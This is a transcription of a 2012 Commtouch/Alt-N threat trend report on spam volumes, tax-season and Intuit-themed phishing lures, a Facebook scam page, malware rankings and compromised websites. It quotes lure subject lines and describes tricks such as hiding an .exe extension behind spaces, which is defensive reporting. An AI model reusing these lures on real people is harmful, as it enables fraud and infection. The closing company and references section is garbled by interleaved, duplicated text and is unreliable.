Internet Threats Trend Report April 2012 - Alt
Transcription
Internet Threats Trend Report April 2012 - Alt
Internet Threats Trend Report April 2012 Internet Threats Trend Report – April 2012 In This Report Is 100 billion the new spam peak? Page 2 Replica spam affiliate program “GlavTorg” closes – No visible effect on spam levels Page 3 Malware attacks focus on US tax season – Accountants and customers targeted Page 5 Compromised websites – an owner’s perspective Page 10 Zombie hotspots – Global weight shifts away from India again Page 13 Q1 2012 Highlights 94 billion Pharmacy ads Average daily spam/phishing emails sent Most popular spam topic (38.5% of spam) Page 2 Page 3 270,000 Zombies India Daily turnover Country with the most zombies (19.2%) Page 12 Page 13 Streaming media/ Downloads Pornography/ Explicit Most popular blog topic on user-generated content sites Website category most likely to be contain malware Page 13 Page 9 blog.commtouch.com w w w. a l t n . c o m www.commtouch.com April 2012 Internet Threats Trend Report Overview Industry and government efforts have dealt a significant blow to spam in the past year. In the first quarter of 2012, an average of 94 billion spam emails were sent per day compared to over 150 billion per day prior to the Rustock botnet takedown in March 2011. Specific social engineering campaigns of note this quarter focused on the U.S. tax season, targeting both consumers and members of the accounting profession. Facebook remains a popular outlet, with a social engineering campaign featuring “an unwatchable video.” Spam trends Spam levels remained low relative to the same period last year. The average decrease compared to Q1 2011 was nearly 40%, with the average daily level dropping to 94 billion spam and phishing emails per day. This decrease followed a marginal increase during the December 2011 holiday season. Spam averaged 75% of all emails sent during the first quarter. A year has now passed since the Rustock botnet takedown that resulted in a significant drop in global spam. There is no sign of a return to pre-Rustock spam levels. The sustained decrease has been attributed to many additional factors including: other botnet takedowns, increased prosecution of spammers and the source industries such as fake pharmaceuticals and replicas, and increased revenues for cybercriminals from other avenues such as banking fraud. At this point it is tempting to conclude that the decade-long growth of spam has been permanently reversed. Time will tell. Spam levels – Dec 2011 to March 2012 Source: Commtouch Spam % of all emails Dec 2011 to March 2012 Source: Commtouch Page 2 blog.commtouch.com www.altn.com www.commtouch.com April 2012 Internet Threats Trend Report Replica spam affiliate program “GlavTorg” closes Spam affiliate programs provide the link between fake pharmaceuticals and replica manufacturers and spammers. GlavTorg was one such program that focused on replica handbags and clothing. In December 2011 GlavTorg announced that it would stop payouts to affiliates at the end of January 2012. To evaluate the effect of the closure Commtouch Labs introduced the “spam-subject cloud Spam topics tool”. The tool samples thousands of spam cloud for endJan 2012 messages at definable intervals and plots frequently occurring terms in larger text. Spam subjects that have been sent in massive quantities become instantly distinguishable. The spam-subject cloud (right) for the end of January show no evidence of GlavTorg related products. In addition the spam levels for the period show no obvious influence (increase or decrease) around the dates of the announcement or the date when payments were stopped. Spammers have apparently easily Source: Commtouch realigned their activities. The spam cloud for the entire first quarter is shown below. Pharmaceuticals (Viagra, Cialis) and replicas (Rolex, Breitling) clearly lead with enhancers and software (CS5, Windows, Adobe) also featuring. “Dating” subjects also feature but due to the great variance of subject words, are less prominent. Spam topics cloud for Q1 2012 Source: Commtouch Page 3 blog.commtouch.com www.altn.com www.commtouch.com April 2012 Internet Threats Trend Report Pharmacy spam increased once again, as it did last quarter, to reach nearly 39% of all spam (around 8% more than the previous quarter). Replica-themed spam also increased in the first quarter of the year by over 5%. Spam topics in Q1 2012 Source: Commtouch Spam domains As part of Commtouch’s analysis of spam trends, Commtouch Labs monitors the domains that are used by spammers in the “from” field of the spam emails. The addresses are typically faked in order to give the impression of a reputable, genuine source. Top spoofed “from” domains in Q1 2012 Source: Commtouch This quarter, gmail.com is once again the most spoofed domain (increasing above 25% for the first time). The top 15 features popular social networking and mail sites (AOL, Yahoo, Page 4 blog.commtouch.com www.altn.com www.commtouch.com April 2012 Internet Threats Trend Report Facebook, LinkedIn, MySpace) as well as DHL.com – often used as part of email malware attacks. Malware trends Blended attacks target accountants? Did cybercriminals target accountants? The scale of a February attack was so large that it certainly must have reached many CPAs – but also many other individuals. Many of the recipients (Accountant or not) may have clicked on the links out of sheer curiosity. The attacks included subjects such as: fraudulent tax return assistance accusations. your accountant license can be revoked. your accountant cpa license termination. income tax return fraud accusations. Phony accountant tax fraud emails lead to malware Source: Commtouch Clicking on the link downloaded a short HTML page that promises “Page is loading, please wait. You will see tax info on this screen.” In the background, the small script creates a nested iFrame which brings in more JavaScript, creating further dynamic content. The process repeats until a large portion of malware code is activated. Within 2 weeks a similarly sized attack seemed to again target accounting practitioners and the small business market, this time by describing fictitious purchases of Intuit accounting software. The subjects included: Page 5 blog.commtouch.com www.altn.com www.commtouch.com April 2012 Internet Threats Trend Report Your QuickBooks software order Your Intuit.com order Your Intuit.com invoice Please confirm your Intuit.com invoice The malware downloaded and deployed in the same way as described above. Phony Accounting software email – links lead to malware Source: Commtouch Email malware Levels of email attached malware were generally low in the first quarter of 2012. Malware distributors generally stuck to their favorite themes such as Fedex delivery notices. Several other interesting social engineering techniques were also used during the quarter: Google have received your CV – with an attached CV submission form Your friend invited you to Twitter – with an attached “invitation card” Someone wanting to be your friend on Hi5 (a social network) Shipping updates for your Amazon.com order – with attached “shipping documents” American Airlines ticket confirmations “I love you” – contains only the text “lovely :-)” and phony assurance that F-Secure Antivirus has found no virus in the attachment Sex pictures – the attached zip refers to www.freeporn4all. Once extracted a typical Explorer view shows a file named “document.txt”. Widening the filename column Page 6 blog.commtouch.com www.altn.com www.commtouch.com April 2012 Internet Threats Trend Report reveals the true .exe extension of the malware (following multiple space characters) – an old trick but probably still effective. Malware email levels – Jan to Dec 2011 Source: Commtouch Email with attached malware in Q1 2012. Source: Commtouch Page 7 blog.commtouch.com www.altn.com www.commtouch.com April 2012 Internet Threats Trend Report Top 10 Malware The table below presents the top 10 most detected malware during the first quarter of 2012 as compiled by Commtouch’s Antivirus Lab. Top 10 Detected Malware Rank Malware name Rank Malware name 1 W32/InstallCore.A2.gen!Eldorado 6 W32/Sality.gen2 2 W32/RLPacked.A.gen!Eldorado 7 W32/HotBar.L.gen!Eldorado 3 W32/Sality.C.gen!Eldorado 8 W32/Vobfus.AD.gen!Eldorado 4 W32/Heuristic-210!Eldorado 9 JS/Pdfka.CI.gen 5 W32/RAHack.A.gen!Eldorado 10 W32/Korgo.V Source: Commtouch Web security Facebook “unwatchable video” scam Several variants of this scam have appeared on Facebook in the last few months. January’s version starts with a friend’s post that looks something like this: Facebook post describes “unwatchable” video (with link to Blogspot page) Source: Commtouch The link takes clickers to a Blogspot page which has been very convincingly designed to look like a Facebook page with an embedded video player. (none of the Facebook Source: Commtouch elements on the top of the page are actually clickable). Visitors are informed that they need the Divx plugin/Youtube Premium plugin. Blogspot page hosts fake vide player and malware download Source: Commtouch Page 8 blog.commtouch.com www.altn.com www.commtouch.com April 2012 Internet Threats Trend Report Clicking on the download link runs a malicious script that performs several actions: 1) A link is posted on the user wall – Facebook extracts the content for the post from the page itself which includes data specifically formatted for this purpose: <title>95% 0f All People Cant even Watch This Video F0r More Than 20 Seconds</title> <meta property=”og:title” content=”95% 0f All People Cant even Watch This Video F0r More Than 20 Seconds” /> <meta property=”og:image” content=”http://i.imgur.com/0F–s.jpg” /> <meta property=”og:description” content=”i dare you to get past the 25 seconds.Just click play” /> 2) The script then installs Firefox or Chrome extensions depending on the browser used. These extensions are used to redirect users to several further scams. The redirections happen no matter what sites the user actually intended to go to. One of the redirections is to a scam offering a $50 Starbucks gift card. After coaxing the Facebook user to like and share the link they are led to an affiliate marketing site. Phony Starbuck voucher coaxes users to like and share Source: Commtouch Compromised websites store malware Many of the emails carrying malware links this quarter either hosted the malware on compromised websites or used these as a platform for redirection. An example of one of the attacks is shown below. This is the screen that would be shown to anyone clicking on the links of the “CPA malware” attacks (see page 5). Compromised website used to host malware message shown on screen while malware loads Source: Commtouch The malware loads in the background while this screen is shown. Meanwhile the host site continues to function normally. Page 9 blog.commtouch.com www.altn.com www.commtouch.com April 2012 Internet Threats Trend Report Homepage of compromised website used to host malware During the first quarter of 2012, Commtouch analyzed which categories of Web sites were most likely to be compromised with malware. Pornographic sites climbed back up to the top spot pushing down Parked domains. As noted in previous reports, the hosting of malware may well be the intention of the owners of the parked domains and pornography sites. A new entry into the top 3 is “Fashion and Beauty” sites - . Source: Commtouch Website categories infected with malware Rank Category Rank Category 1 Pornography/Sexually Explicit 6 Education 2 Parked Domains 7 Health & Medicine 3 Fashion and Beauty 8 Computers & Technology 4 Portals 9 Business 5 Entertainment 10 Leisure & Recreation Source: Commtouch Compromised Websites: An Owner’s Perspective Having observed the phenomenon of hacked websites for some time, Commtouch, in cooperation with StopBadware, undertook a survey of webmasters whose sites had been compromised. The report presents statistics and opinions on how site owners navigate the process of learning their sites have been hacked and repairing the damage. Data from the poll reveals that malicious actors are often able to compromise legitimate websites without the site owners' knowledge: over 90% of respondents didn't notice any strange activity, despite the fact that their sites were being abused to send spam, host Page 10 blog.commtouch.com www.altn.com www.commtouch.com April 2012 Internet Threats Trend Report phishing pages, or distribute malware. Nearly two-thirds of the webmasters surveyed didn't know how the compromise had happened. Other highlights from analysis of the survey's responses include: About half of site owners discovered the hack when they attempted to visit their own site and received a browser or search engine warning. 26% of site owners had not yet figured out how to resolve the problem at the time they completed the survey. 40% of survey respondents changed their opinion of their web hosting provider following a compromise. In addition to analysis and quotes from site owners, the report provides tips to help webmasters prevent their sites from being compromised. More details, including an infographic and a brief presentation summarizing the report are available at: http://www.commtouch.com/compromised-websites-report-2012. Phishing Trends Phishing attacks target account information for many services: banks, email and social network accounts, and online games. Commtouch’s Security Blog has also featured phishing aimed at Google Adwords customers. In January, a similar phishing attack was directed at Microsoft adCenter users. The links in the email below led to a very convincing replica of the adCenter login page. Microsoft adCenter phishing attack Source: Commtouch Page 11 blog.commtouch.com www.altn.com www.commtouch.com April 2012 Internet Threats Trend Report During the first quarter of 2012, Commtouch analyzed which categories of legitimate Web sites were most likely to be hiding phishing pages (usually without the knowledge of the site owner). Portals (offering free website hosting) jumped into the highest position. Sites related to games (the previous leader), dropped off the list. Website categories infected with phishing Rank Category Rank Category 1 Portals 6 Sports 2 Shopping 7 Leisure & Recreation 3 Fashion & Beauty 8 Health and medicine 4 Education 9 Real Estate 5 Business 10 Personal sites Source: Commtouch Zombie trends The first quarter saw an average turnover of 270,000 zombies each day that were newly activated for sending spam. This number is an increase over the 209,000 of the fourth quarter of 2011. The large drop at the start of November appears to be a result of the Esthost botnet takedown. Although this botnet was primarily used for DNS changing (redirecting Web requests to malicious sites), it appears that some portion was also used to send spam. Spammers have worked to source new zombies since the start of 2012. Daily newly activated spam zombies: Oct 2011 to Mar 2012 Source: Commtouch Page 12 blog.commtouch.com www.altn.com www.commtouch.com April 2012 Internet Threats Trend Report Zombie Hot Spots India again claimed the top zombie producer title, but dropped below 20% from nearly 24% in Q4 2011. Brazil and the Russian Federation both climbed back up to the 2 nd and 3rd positions. Argentina, Poland and Italy joined the top 15, displacing The United States, Romania and Ukraine. Worldwide Zombie distribution in Q1 2012 Source: Commtouch Web 2.0 trends Commtouch’s GlobalView Cloud tracks billions of Web browsing sessions and URL requests, and its Web Filtering service includes highly granular categorization of Web 2.0 content. In addition to filtering accuracy, this provides insight into the most popular user generated content sites. Once again, “streaming media and downloads” was the most popular blog or page topic staying at 22%. The streaming media & downloads category includes sites with MP3 files or music related sites such as fan pages. Most popular categories of user-generated content Rank Category Percentage Rank 1 Streaming Media & Downloads 22% 8 Religion 5% 2 Computers & Technology 8% 9 Sports 4% 3 Entertainment 7% 10 Education 4% 4 Pornography/Sexually Explicit 5% 11 Leisure & Recreation 3% 5 Restaurants & Dining 5% 12 Health & Medicine 3% 6 Fashion & Beauty 5% 13 Games 3% 7 Arts 5% 14 Sex Education 2% . Page 13 blog.commtouch.com Category Percentage Source: Commtouch www.altn.com www.commtouch.com April 2012 Internet Threats Trend Report April 2011 Internet Threats Trend Report About Commtouch About Commtouch Commtouch® (NASDAQ: CTCH) safeguards the world’s leading security companies and service providers with cloud-based Internet security services. Real-time threat intelligence from Commtouch’s GlobalView™ Commtouch® (NASDAQ: CTCH) safeguards the world’s leading security companies andCloud powers Web security, email security and antivirus solutions, protecting thousands of organizations and hundreds of service providers with cloud-based Internet security services. Real-time threat intelligencemillions of users worldwide. from Commtouch’s GlobalView™ Cloud (NASDAQ: powers Web emailInternet security and technology antivirus to more than Commtouch® CTCH) security, provides proven security solutions, protecting thousands of organizations hundreds of into userstheir solutions. 150 security companies andand service providersof formillions integration Commtouch’s GlobalView™ and patented Recurrent Pattern Detection™ (RPD™) worldwide. About Commtouch technologies are founded on a unique cloud-based approach, and work together in a comprehensive feedback loop to protect effectively in all languages and formats. Commtouch’s Command Antivirus utilizes a multi-layered approach to provide award winning malware detection and industry-leading performance. Commtouch technology Alt-N Technologies develops affordable and secure messaging andtransactions collaboration solutions automatically analyzes billions of Internet in real-time in itsdesigned global datafor, and trusted by, small-to-medium businesses incenters over to 90identify countries and 25 worldwide. company’s flagship solutions, the new threats as languages they are initiated, enabling ourThe partners and customers to protect from spam and and enablingServers, safe, compliant browsing. The MDaemon® Messaging Server and the end-users SecurityGateway formalware, Exchange/SMTP install in minutes, include the latest company’s expertise in building efficient, massive-scale security services has resulted in The company uses email security technologies, and require minimal support and administration to operate and maintain. mitigating Internet threats for thousands of organizations and hundreds of millions of users a network of global distributorsin and resellersCommtouch for the sales and support products.in Netanya, Israel, 190 countries. was founded in 1991,of is its headquartered and has a subsidiary with offices in Sunnyvale, California and Palm Beach Gardens, Florida. Reported global spam levels are based on Internet email traffic as measured from unfiltered data streams, not including internal corporate traffic. Therefore global spam levels will differ from the quantities reaching end user inboxes, due to several possible layers of filtering. Spam levels do not include emails with attached malware. http://krebsonsecurity.com/2012/01/glavmed-sister-program-glavtorg-to-close/ http://blog.commtouch.com/cafe/web-security/facebook-95-0f-all-people-cant-even-watch-this-videoReported global spam levels are based on Internet email traffic as measured from unfiltered data streams, • Reported global spam levels arebased on Internet email traffic as measured from unfiltered data streams, not including internal not including internal corporate traffic. Therefore global spam levels will differ from the quantities reaching f0r-more-than-20-seconds/ end user inboxes, to several possible of filtering. corporate traffic. Therefore global spam levels willduediffer from the layers quantities reaching end user inboxes, due to several possible layers of http://blog.commtouch.com/cafe/anti-spam/the-spam-cloud-ep01-2/ http://blog.commtouch.com/cafe/email-security-news/ups-malware-now-sent-via-dhl/ http://blog.commtouch.com/cafe/email-security-news/bs-microsoft-adcenter-phishing/ filtering. Spam levels do not include emails with attached malware. http://blog.commtouch.com/cafe/email-security-news/huge-amounts-of-ups-and-facebook-malware http://blog.commtouch.com/cafe/data-and-research/infographic-compromised-websites-an-ownersattachments/ • http://krebsonsecurity.com/2012/01/glavmed-sister-program-glavtorg-to-close/ perspective/ http://blog.commtouch.com/cafe/anti-spam/ipad-2-affiliate-marketing-scams-and-incompetent- About Alt-N Technologies References and Notes References andReferences Notes and Notes spammers/ • http://blog.commtouch.com/cafe/web-security/facebook-95-0f-all-people-cant-even-watch-this-video-f0r-more-than-20-seconds/ http://blog.commtouch.com/cafe/malware/t-online-used-for-fake-av/ http://blog.commtouch.com/cafe/anti-spam/has-the-reported-disruption-of-rustock-affected-spam• http://blog.commtouch.com/cafe/anti-spam/the-spam-cloud-ep01-2/ levels/ • http://blog.commtouch.com/cafe/email-security-news/bs-microsoft-adcenter-phishing/ http://blog.commtouch.com/cafe/anti-spam/loads-of-phony-twitter-emails/ http://blog.commtouch.com/cafe/phishing/how-to-scale-phishing-by-using-the-cloud/ • http://blog.commtouch.com/cafe/data-and-research/infographic-compromised-websites-an-owners-perspective/ http://blog.commtouch.com/cafe/anti-spam/free-hosting-of-spam-content-on-forum-sites/ http://blog.commtouch.com/cafe/spam-favorites/spammers-feel-the-love-on-valentine%e2%80%99sday/ http://blog.commtouch.com/cafe/malware/how-pdf-files-hide-malware-example-pdf-scan-from-xerox/ http://blog.commtouch.com/cafe/email-marketing/mass-emailings-support-change-in-egypt-and-nowsyria/ http://blog.commtouch.com/cafe/malware/malware-spread-via-facebook-chat/ http://blog.commtouch.com/cafe/malware/kama-sutra-virus-%e2%80%93-a-position-youdon%e2%80%99t-want-to-get-into%e2%80%a6/ http://blog.commtouch.com/cafe/data-and-research/spammers-return-from-holiday/ http://blog.commtouch.com/cafe/data-and-research/spam-declines-30pc-in-q4-2010/ http://blog.commtouch.com/cafe/spam-favorites/the-apologetic-spammer/ • http://blog.commtouch.com/cafe/email-security-news/twice-as-bad-traffic-ticket-with-attached-malware/ Visit us: www.commtouch.com and blog.commtouch.com Email us: [email protected] Call us: 650 864 2000 (US) or +972 9 863 6888 (International) Copyright© 2011 Commtouch Software Ltd. Recurrent Pattern Detection, RPD, Zero-Hour and GlobalView are trademarks, and Commtouch, Authentium, Command Antivirus and Command Anti-malware are registered trademarks, of Commtouch. U.S. Patent No. 6,330,590 is owned by Commtouch.. Visit us: www.commtouch.com and blog.commtouch.com Email us: [email protected] Call us: 650 864 866-601-ALTN 2000 (US) or(2586) +972 9 863 6888 (International) www.AltN.com Phone: © 1996 - 2012 Alt-N Technologies, Ltd. MDaemon, WorldClient, RealyFax, and Alt-N are trademarks of Alt-N Technologies, Ltd. Copyright© Commtouch Software Ltd. Recurrent Pattern Detection, RPD, Zero-Hour and GlobalView are trademarks, All trademarks are 2012 property of their respective owners. and Commtouch, Authentium, Command Antivirus and Command Anti-malware are registered trademarks, of 04.17.2012 Commtouch. U.S. Patent No. 6,330,590 is owned by Commtouch.. © 2012 Commtouch Software Ltd. [email protected] Phone: 650-864-2114 (US) +972-9-863-6895 (International) Recurrent Pattern Detection, RPD, Zero-Hour and GlobalView are trademarks, and Commtouch is a registered trademark, of Commtouch Software Ltd. U.S. Patent No. 6,330,590 is owned by Commtouch. www.blog.commtouch.com www.commtouch.com
Similar documents
October 2011 Internet Threats Trend Report
During the second quarter of 2011, Commtouch analyzed which categories of legitimate Web sites were most likely to be hiding phishing pages (usually without the knowledge of the site owner). Sites ...
More information